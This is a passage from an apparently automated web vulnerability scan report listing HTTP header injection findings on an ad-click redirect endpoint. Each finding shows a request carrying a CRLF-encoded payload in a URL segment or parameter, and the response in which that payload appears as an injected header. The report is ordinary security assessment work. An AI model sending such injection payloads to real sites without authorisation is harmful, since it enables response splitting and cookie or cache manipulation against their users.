Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=alnh31tZdPZcF3rIxRrghNed7LF9YWUJl8aZb520eLyVqoqi32renGbQZajW4XZdiJW0hFi8TkEEMTyr2UYSXrSmZb9P4ZaSLp6inPfZaVlOqLBVbKgo8OTA0nHbYeMbqZdZcQr4KdZcsdEPBw4pKCe2O0mt5Zb86rsyjWoZcH6lswqbZc9wJyqg4Oodufp7Ro3VK3RP9flDZcZb8FKp8sHwfUVITY7ZaQ8AXH4tuN3w5ZdZdjbRZcqhF7fVZcDSE6CJda3RjEZa38kaNkagdHq6hhqH0rtqqnblCADgIfAZagenlo5vgIVqt7FYYU88iTPxPd5ZaoZawZdKfZaM3ZdMWOEuU536gjc7GiOZcqg5UMBVEBMZbbmdbPjlaAIF6TJxwj8G29k994B8QYtRerLvKgZaEgDuGuZc9wTrpcmhan4to68kdQnNZcrbeDYlOZaYM6I2I6QfY6JlZak4Asj4yFZbFPF6b9L9Gnpl5rOXuUU6esPk0XMV3uTwct3S; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:24:07 GMT;
Content-Type: text/html
Location: ;ord=378e3
c81c5b2e403

Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.108. http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload cfad9%0d%0a7190c6dbafc was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/cfad9%0d%0a7190c6dbafc/pixel.quantserve.com/r HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=ahnh31m5aSZb8e9wPQIj1pvoeZd94UDt69LXCLtVEbF1WZai53mDNZboMeDj2ggUM6PsU4aXcU6KBVvakyQg3aNORLWQknbnBudtwwTi6G7PV5i6sw1oCJra3ZcWaOi7ClZceMgU4uaVfMCSZbaYm6bU6xbFIZdZbjMZceZaCjdlXZdLjIhJppOl7fIKit1YV8fhiTke7dwwgSvTGeCsY3bZaQYqVoECQ4TEPCEZcPvcalCxZduGgxaeIP304xfxDlY4Q0WpfcedyfqLEkrUa3bDfZa7xEStJ3w1e7CXqDe9AA3cpDje8BEYn9yOLSFIKJlqjnhC7VsYZcnwhXy4FU5hdwZahsNBZd0bYVeKnYXlZcZcCfufga8e4GfpOf7cEXL47ZcmQZaXQUMNLt94R5lAxtAoEZaSFjejRaAn8f32Zda4QJeilY8ZdICmZcbsTCpy1xXVPfSudhxQ2oMNTHXuVmZb0lpYsKZdrhUmLZcB3kgWqn7W5ROIex; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:25:33 GMT;
Content-Type: text/html
Location: cfad9
7190c6dbafc
/pixel.quantserve.com/r
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.109. http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 8b0b6%0d%0af4319473f03 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/8b0b6%0d%0af4319473f03/r HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=[cookie value omitted]; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:25:50 GMT;
Content-Type: text/html
Location: http:/8b0b6
f4319473f03
/r
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.110. http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload bc699%0d%0a28b72215d10 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/bc699%0d%0a28b72215d10 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=[cookie value omitted]; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:26:04 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/bc699
28b72215d10

Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.111. http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r [a parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r

Issue detail

The value of the a request parameter is copied into the Location response header. The payload de792%0d%0adb8b6b2f830 was submitted in the a parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r;a=de792%0d%0adb8b6b2f830&vehicle=altima&dcp=zmm.57350078.&dcc=40424790.233402132 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aXnh31OZb36HmPr3SMWFeIRfvBmPHOwZc9bgPZcyyCZdCbxnjoyVv5ZdtqC6Hc8F3F9RxfXZaFtjxqM527dCRyZdPJJpIm8B1PnAQlZdgtLjoAefn0hbwYLwZc8u9PJJXPntRKxOWZcMv2kbVZaJZas0kwOmQnwsZbBT4RVd0gk3lm4HSoZcemp3UVeuqlFX8PqZbC1teWW0rAn4jBVOdMgJC6FOoOkTvUJo2Wtartlw6ZdvkXY2sLTdTGOBij9e3ZbB5KwZadKat8dWBqaflt4NnuT4wRRgZd8DprRRFkZcHZaJXZbhktKNkT8QTrsM3UsOHyM2FegEaYnWFZa1pZaevjpMpEg90Ep1nNXPg326IKDWmUgSMmDP3eZdBYYrZcwRVB8ohifa3jSoJGoTNkaQ86Yg5sdMpd1pSuZaMTb4DlalVyvV5DLDCfyFuWnfrZcR6hqSVGPZbiPZcXcoIgyuBpQYC688pZbS9NLrPYbEIYJRkpofiW9HR1p; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:24:34 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r;a=de792
db8b6b2f830
&vehicle=altima&dcp=zmm.57350078.&dcc=40424790.233402132
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.112. http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r [dcc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r

Issue detail

The value of the dcc request parameter is copied into the Location response header. The payload b2393%0d%0a04e19a6bbd5 was submitted in the dcc parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=altima&dcp=zmm.57350078.&dcc=b2393%0d%0a04e19a6bbd5 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=[cookie value omitted]; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:25:24 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=altima&dcp=zmm.57350078.&dcc=b2393
04e19a6bbd5

Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.113. http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r [dcp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r

Issue detail

The value of the dcp request parameter is copied into the Location response header. The payload 5c9bc%0d%0ab7d0a7d3b63 was submitted in the dcp parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=altima&dcp=5c9bc%0d%0ab7d0a7d3b63&dcc=40424790.233402132 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=[cookie value omitted]; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:25:07 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=altima&dcp=5c9bc
b7d0a7d3b63
&dcc=40424790.233402132
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.114. http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 3e6ac%0d%0a9377000351 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r?3e6ac%0d%0a9377000351=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=[cookie value omitted]; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:24:34 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r?3e6ac
9377000351
=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.115. http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r [vehicle parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r

Issue detail

The value of the vehicle request parameter is copied into the Location response header. The payload b3f74%0d%0a884d93094bb was submitted in the vehicle parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=b3f74%0d%0a884d93094bb&dcp=zmm.57350078.&dcc=40424790.233402132 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
